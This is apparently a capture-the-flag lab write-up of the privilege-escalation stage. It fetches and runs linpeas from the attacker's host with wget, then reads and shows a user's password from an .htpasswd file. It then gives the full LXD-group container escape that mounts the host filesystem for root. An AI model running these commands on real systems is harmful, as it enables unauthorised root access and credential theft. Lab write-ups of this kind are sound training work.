Privilege escalation

Misconfigured SUID Binaries

No, I cannot see any binary which can be abused here.

Checking for sudo permission

It is asking for a password and currently. We don't have it.

Running linpeas and collection result

# In kali linux:
FILE=$(locate linpeas.sh | head -n1)
DIR=$(dirname "$FILE")
echo "Serving files from $DIR on port 8000..."
cd "$DIR" && python3 -c "import http.server, socketserver; \
print('Serving on port 8000...'); \
socketserver.TCPServer(('', 8000), http.server.SimpleHTTPRequestHandler).handle_request()"

# In victim machine:
wget http://10.10.16.8:8000/linpeas.sh; chmod a+x linpeas.sh ; ./linpeas.sh

Interesting result:

Privilege escalation

I saw that there is .htpasswd file in web directory. I will see it's content.

cat /var/www/html/.htpasswd

We can see this file has the password for Mike's user.

You can see that mike is a normal user with one extra privilege of "lxd" group. We can exploit this group.

Lxd Privilege EscalationHacking Articles

su mike # Sheffield19

Exploiting LXD group member.

GitHub - samoN1k0la/LXD-Privilege-Escalation: Tutorial on how to do privilege escalation on linux using Linux Container ManagerGitHub

In order to take escalate the root privilege of the host machine you have to create an image for lxd thus you need to perform the following the action:

Steps to be performed on the attacker machine:

Download build-alpine in your local machine through the git repository.
Execute the script “build -alpine” that will build the latest Alpine image as a compressed file, this step must be executed by the root user.
Transfer the tar file to the host machine

Steps to be performed on the host machine:

Download the alpine image
Import image for lxd
Initialize the image inside a new container.
Mount the container inside the /root directory

Download build-alpine in our kali linux.

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine

Although, I am getting errors. I can see that a tar file has been made.

Sending the Alpine linux container to the target

# Change file name to poc.tar.gz
mv alpine-v3.13-x86_64-20210218_0139.tar.gz poc.tar.gz

# start the server
python3 -m http.server 80

# In the victim machine download the file.
wget http://10.10.16.8/poc.tar.gz

Configuring the container on the target machine

lxc image import poc.tar.gz --alias myimage
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

cd /mnt/root/root

PreviousTFTP [Initial Access]NextFlag

Last updated 1 year ago

hashtagMisconfigured SUID Binaries

hashtagChecking for sudo permission

hashtagRunning linpeas and collection result

hashtagInteresting result:

hashtagPrivilege escalation

hashtagExploiting LXD group member.

hashtagDownload build-alpine in our kali linux.

hashtagSending the Alpine linux container to the target

hashtagConfiguring the container on the target machine

Misconfigured SUID Binaries

Checking for sudo permission

Running linpeas and collection result

Interesting result:

Privilege escalation

Exploiting LXD group member.

Download build-alpine in our kali linux.

Sending the Alpine linux container to the target

Configuring the container on the target machine